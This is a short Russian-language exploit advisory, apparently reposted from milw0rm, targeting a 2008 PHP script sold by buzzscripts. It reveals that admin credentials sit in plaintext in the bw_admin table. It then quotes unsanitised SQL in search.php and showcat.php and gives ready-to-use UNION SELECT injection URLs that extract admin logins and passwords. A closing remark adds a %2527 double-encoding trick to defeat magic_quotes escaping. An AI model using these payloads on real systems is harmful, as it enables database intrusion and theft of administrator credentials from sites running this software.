Офф.сайт: www.buzzscripts.com
Стоймость: 40$
Release date: 22.08.2008
Префикс таблиц бд: bw_
Табличка: bw_admin
Клонки: login,password
Алгоритм шифрования: нету его(т.е в открытом виде)
Админка: http://localhost/admin.php

Сценарий search.php

Уязвимый код:

$q = "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%';";

...

$qry = "SELECT * FROM bw_main WHERE wp_status = 1 AND wp_title LIKE '%".$_GET['search']."%' LIMIT $from, $max_results;";

Параметр search передаёться, как есть, без какой либо фильтрации. Что даёт нам выполнить произвольный SQL-зпрос.

Необходимо: magic_quotes_gpc = Off

Эксплойт:

http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,p assword),user(),9,10,11,12,13,14,15,16+from+bw_adm in/*


Сценарий showcat.php

Уязвимый код:

$query = mysql_query("SELECT * FROM bw_main WHERE wp_link_cat='".urldecode($_GET['cat'])."' AND wp_status = 1;");

Необходимо: magic_quotes_gpc = Off

Эксплойт:

http://localhost/[installdir]/showcat.php?cat=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,p assword),user(),9,10,11,12,13,14,15,16+from+bw_adm in/*

http://milw0rm.com/exploits/6527 (c) ~!Dok_tOR!~

Вообще-то во втором случае (showcat.php) magic_quotes_gpc не имеет значения, так как параметр cat перед выполнением запроса попадает в функцию urldecode(), т.е. экранирование кавычки можно обойти, заменив ее на %2527